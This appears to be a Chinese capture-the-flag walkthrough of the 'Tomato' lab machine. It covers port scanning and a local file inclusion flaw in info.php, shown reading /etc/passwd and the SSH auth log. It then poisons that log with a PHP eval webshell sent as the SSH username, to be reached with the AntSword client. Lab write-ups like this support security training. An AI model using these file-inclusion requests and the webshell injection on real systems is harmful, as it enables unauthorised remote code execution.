将tomato改为NAT模式
扫描ip
arp-scan -l
扫描端口,发现ssh服务端口从22改为2211
扫描目录
发现http://192.168.31.134/antibot_image/ 访问
检察全部php文件的源码,看看有什么不同的地方
在info.php的源码中发现问题
在输入后,成功显示,阐明文件包含漏洞
info.php?image=/etc/passwd
通过/var/log/auth.log这个在linux中使用的日志文件,成功检察到日志
info.php?image=/var/log/auth.log
使用ssh登录,看日志里会不会出现记载
发现日志中有记载
使用kali,让一句话木马写入日志中
ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,
我的kali写入失败,选择用xshell连接
之后点击连接,当然肯定会失败,日志记载了就可以
使用中国蚁剑连接
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
